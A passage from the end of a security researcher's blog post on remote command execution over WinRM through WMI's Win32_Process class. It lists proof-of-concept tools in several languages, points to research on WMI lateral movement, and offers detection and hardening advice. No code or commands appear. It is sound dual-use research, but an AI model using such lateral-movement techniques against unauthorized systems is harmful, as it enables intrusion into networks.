Project source code is accessible in the WSMan-WinRM GitHub repository, which includes the CSharp version as well as several other POC implementations that leverage the WMI Win32_Process class execution method.  The following are included in the project:

  • SharpWSManWinRM.cs (CSharp)
  • CppWSManWinRM.cpp (C++)
  • WSManWinRM.vbs (Visual Basic Script)
  • WSManWinRM.js (JScript)
  • WSManWinRM.ps1 (PowerShell – similar to the Invoke-WSManAction cmdlet)

Tradecraft

Calling the Win32_Process class is not the only way to leverage WMI classes for remote command execution.  Philip Tsukerman (@PhilipTsukerman) released a lot of great information about WMI lateral movement tradecraft in the “No Win32_Process Needed – Expanding The WMI Lateral Movement Arsenal” blog post as well as in this talk.

Defensive Considerations

There are certainly approachable opportunities for detecting and restricting WinRM remote command execution/lateral movement.  Consider the following:

  • Monitor the remote process execution chains stemming from wmiprvse.exe and winrshost.exe
  • Monitor the Microsoft-Windows-WinRM/Operational Event Log for suspicious entries.  Note: During testing of the WMI class interactions (WinRM.vbs/SharpWSManWinRM/etc.), it did not appear that successfully connected sessions were logged here.  However, unsuccessful attempts were logged with the name of the WMI resource.
  • Consider whitelisting trusted hosts to allow only certain machines to connect to WinRM servers. More information can be found in this Red Canary blog post.  Note: The WinRM TrustedHosts setting controls which hosts a client can connect to.  As such, it can be advantageous for managing this in a centralized manner, but a better approach is to leverage jump hosts and (host) firewall rules to control which machines should be allowed to connect to WinRM hosts.
  • Administrators are not the only users that can leverage WinRM for remote management. Members of the Remote Management Users local/domain group can connect to WMI resources over WinRM.  Ensure that group membership is limited to authorized personnel.

Conclusion

Thank you for taking the time to read this blog post.  I believe there are more interesting research opportunities in this area (maybe a CSharp “PSSession” capability?).  I look forward to seeing others take this to the next level.  Lastly, I’d like to give a shout out to Leo Loobeek (@leoloobeek) – thank you for the fantastic insight in our discussions about COM and coding.  It certainly helped shape this post!

~ @bohops
